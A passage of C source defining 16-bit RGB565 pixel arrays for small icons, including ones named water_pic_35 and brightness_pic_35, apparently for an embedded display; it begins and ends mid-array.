0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xe32c, 0xff7d, 0xec91, 0xd061, 0xe3ae, 0xffff, 0xffff, 0xe3ad, 0xecd2, 0xffff, 0xffff, 0xd9a5, 0xda48, 0xf638, 0xda69, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xdaca, 0xf679, 0xf659, 0xed75, 0xed75, 0xf69a, 0xf596, 0xd1a5, 0xd165, 0xd185, 0xd144, 0xdaca, 0xf5d6, 0xf69a, 0xf5f7, 0xed75, 0xed95, 0xf638, 0xf69a, 0xe30b, 0xd103, 0xd185, 0xd185, 0xd103, 0xec51, 0xed55, 0xd103, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd123, 0xe40f, 0xfefb, 0xd185, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xf658, 0xf638, 0xda07, 0xd164, 0xd185, 0xd185, 0xd165, 0xd123, 0xec91, 0xf6ba, 0xf5f7, 0xed34, 0xf5d6, 0xf6fb, 0xe3ae, 0xd144, 0xd185, 0xd165, 0xd185, 0xe430, 0xf679, 0xf659, 0xf5b6, 0xed55, 0xf5b6, 0xf69a, 0xf5b6, 0xd9a5, 0xd144, 0xd185, 0xd165, 0xd1a5, 0xec91, 0xf699, 0xf658, 0xf596, 0xed55, 0xf5d6, 0xf6ba, 0xed54, 0xd164, 0xd164, 0xd185, 0xd185, 0xd103, 0xf5f7, 0xe3ae, 0xd123, 0xd185, 0xd185, 0xd103, 0xf638, 0xe3ae, 0xd123, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xdaa9, 0xf618, 0xecf3, 0xdaeb, 0xecf3, 0xf5d6, 0xd144, 0xda48, 0xec91, 0xe450, 0xecd2, 0xf699, 0xe32c, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd124, 0xd144, 0xdaeb, 0xe40f, 0xe40f, 0xdaaa, 0xd123, 0xd165, 0xd185, 0xd185, 0xd185, 0xd144, 0xd103, 0xda28, 0xe36d, 0xe40f, 0xe3ef, 0xe30b, 0xd165, 0xd123, 0xd185, 0xd185, 0xd185, 0xd165, 0xda48, 0xda89, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xe32b, 0xdaaa, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xda48, 0xe40f, 0xd9c6, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xd9e6, 0xe38d, 0xe430, 0xe3ae, 0xd9e6, 0xd123, 0xd185, 0xd185, 0xd185, 0xd185, 0xd103, 0xd165, 0xdaca, 0xe3ef, 0xe430, 0xe3ce, 0xda69, 0xd123, 0xd164, 0xd185, 0xd185, 0xd185, 0xd165, 0xd103, 0xd185, 0xe2eb, 0xe3ef, 0xe430, 0xe3ae, 0xda48, 0xd103, 0xd165, 0xd185, 0xd185, 0xd185, 0xd164, 0xdaa9, 0xda07, 0xd165, 0xd185, 0xd185, 0xd164, 0xdaeb, 0xda28, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd123, 0xd185, 0xe430, 0xf5d6, 0xed55, 0xecf3, 0xecf3, 0xecf3, 0xed34, 0xed95, 0xec71, 0xd9a5, 0xd123, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd103, 0xd103, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xd124, 0xd103, 0xd123, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd103, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xd124, 0xd103, 0xd123, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd123, 0xd103, 0xd123, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd123, 0xd103, 0xd123, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd144, 0xd164, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd165, 0xd103, 0xd164, 0xda69, 0xe34c, 0xe3ae, 0xe36d, 0xda89, 0xd165, 0xd103, 0xd165, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd164, 0xd124, 0xd123, 0xd124, 0xd144, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185,
0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185, 0xd185
};
const uint16_t water_pic_35[] = {
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0841, 0x18c3, 0x39e7, 0x7bef, 0x8c71, 0x9492, 0x9492, 0x8c71, 0x7bcf, 0x528a, 0x10a2, 0x0861, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0861, 0x5acb, 0xa534, 0xe71c, 0xffff, 0xffdf, 0xdefb, 0xce79, 0xce59, 0xd6ba, 0xf79e, 0xffff, 0xe73c, 0xb596, 0x52aa, 0x10a2, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x528a, 0xb5b6, 0xffff, 0xef5d, 0x9492, 0x8430, 0x4208, 0x2104, 0x0861, 0x0841, 0x18c3, 0x39c7, 0x6b6d, 0x8c51, 0xce79, 0xffff, 0xc638, 0x5acb, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xa534, 0xffdf, 0xf79e, 0x8410, 0x2965, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x18e3, 0x630c, 0xce59, 0xffff, 0xa514, 0x18c3, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x1082, 0xce59, 0xffff, 0xad55, 0x2124, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0841, 0x73ae, 0xffff, 0xef7d, 0x10a2, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0020, 0xd69a, 0xffff, 0x5acb, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x2124, 0xffff, 0xf79e, 0x10a2, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0861, 0xd6ba, 0xffff, 0x31a6, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xffff, 0xef7d, 0x10a2, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x9492, 0xffff, 0x73ae, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x2104, 0xffff, 0x9cf3, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x4208, 0xffff, 0xbdd7, 0x0841, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x738e, 0xffdf, 0x528a, 0x0000, 0x0000, 0x0000,
0x0000, 0x0841, 0xad55, 0xffdf, 0x39c7, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0020, 0x4208, 0x3186, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0841, 0xc638, 0xc618, 0x1082, 0x0000, 0x0000,
0x0000, 0x39e7, 0xffff, 0x9cf3, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x1082, 0xc638, 0x7bcf, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x5aeb, 0xffff, 0x4a49, 0x0000, 0x0000,
0x0000, 0x73ae, 0xffff, 0x5acb, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x2965, 0xef7d, 0xd69a, 0x2104, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x18c3, 0xce59, 0x9cf3, 0x0841, 0x0000,
0x0000, 0xb5b6, 0xc638, 0x0020, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x738e, 0xffff, 0xffff, 0x4a49, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x8c51, 0xdedb, 0x10a2, 0x0000,
0x1082, 0xffff, 0xad75, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0020, 0xd6ba, 0xffff, 0xffff, 0xe71c, 0x2104, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x738e, 0xf7be, 0x39c7, 0x0000,
0x18e3, 0xffff, 0x73ae, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x2965, 0xffff, 0xffff, 0xffff, 0xffff, 0x52aa, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x39c7, 0xef5d, 0x5aeb, 0x0000,
0x2104, 0xffff, 0x52aa, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xb5b6, 0xffff, 0xffff, 0xffff, 0xffff, 0xbdd7, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x18e3, 0xdefb, 0x73ae, 0x0000,
0x2104, 0xffff, 0x4a49, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x3186, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0861, 0xd69a, 0x7bef, 0x0000,
0x2104, 0xffff, 0x528a, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x6b6d, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe71c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x18c3, 0xdedb, 0x7bcf, 0x0000,
0x18e3, 0xffff, 0x6b6d, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xdedb, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0861, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x3186, 0xe73c, 0x632c, 0x0000,
0x10a2, 0xffff, 0xa514, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x4208, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xbdf7, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x630c, 0xef7d, 0x39e7, 0x0000,
0x0000, 0xbdf7, 0xc618, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x8c51, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xef7d, 0x0861, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x8c51, 0xdedb, 0x10a2, 0x0000,
0x0000, 0x7bef, 0xf7be, 0x4228, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x18e3, 0xd6ba, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x73ae, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0841, 0xb5b6, 0xad55, 0x0841, 0x0000,
0x0000, 0x4228, 0xffff, 0x9492, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x2124, 0xe73c, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x8410, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x4a69, 0xffff, 0x4a69, 0x0000, 0x0000,
0x0000, 0x0841, 0xb596, 0xef5d, 0x2945, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0020, 0x9cf3, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7be, 0x31a6, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0020, 0xad75, 0xc638, 0x10a2, 0x0000, 0x0000,
0x0000, 0x0000, 0x4a49, 0xffff, 0x9cf3, 0x0020, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x1082, 0xb5b6, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x630c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x52aa, 0xffff, 0x5acb, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x9cf3, 0xffff, 0x4228, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0841, 0xa514, 0xdedb, 0xffff, 0xffff, 0xffff, 0xb5b6, 0x52aa, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xffdf, 0xad55, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x10a2, 0xdedb, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0841, 0x2104, 0x2124, 0x18c3, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xffff, 0xffdf, 0x2124, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xd6ba, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xffff, 0xffdf, 0x2124, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x10a2, 0xd69a, 0xffff, 0x6b4d, 0x0861, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x4a49, 0xf7be, 0xffdf, 0x2124, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0020, 0xc618, 0xffff, 0xce79, 0x5aeb, 0x0861, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x39c7, 0xa514, 0xffff, 0xb5b6, 0x2945, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x630c, 0xc618, 0xffff, 0xbdd7, 0x8c51, 0x5acb, 0x0841, 0x0000, 0x0000, 0x0000, 0x0000, 0x0020, 0x2965, 0x8c51, 0x9cd3, 0xffff, 0xd69a, 0x632c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x1082, 0x632c, 0xbdd7, 0xef7d, 0xffdf, 0xce79, 0xbdf7, 0xc618, 0xc618, 0xc618, 0xce59, 0xe73c, 0xf7be, 0xc618, 0x738e, 0x18e3, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0861, 0x18c3, 0x52aa, 0x8c51, 0x9492, 0x9492, 0x9492, 0x9492, 0x8c71, 0x6b4d, 0x18c3, 0x1082, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000
};
const uint16_t brightness_pic_35[] = {
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x2104, 0x2965, 0x4a69, 0x7bcf, 0x9492, 0x9492, 0x7bef, 0x528a, 0x31a6, 0x2104, 0x0020, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0841, 0x4228, 0x9492, 0xf7be, 0xffff, 0xffdf, 0xe71c, 0xd6ba, 0xd69a, 0xdefb, 0xf79e, 0xffff, 0xffdf, 0x9cf3, 0x4a49, 0x1082, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x528a, 0xad75, 0xffff, 0xf79e, 0x8c71, 0x7bcf, 0x4228, 0x2945, 0x18c3, 0x10a2, 0x2104, 0x39c7, 0x632c, 0x8430, 0xd69a, 0xffff, 0xbdf7, 0x52aa, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xbdd7, 0xffff, 0xffff, 0x73ae, 0x3186, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x18e3, 0x52aa, 0xce79, 0xffff, 0xbdf7, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xc618, 0xffff, 0xb5b6, 0x10a2, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0861, 0x6b6d, 0xffff, 0xef7d, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xce79, 0xffff, 0x632c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x1082, 0xffff, 0xf79e, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
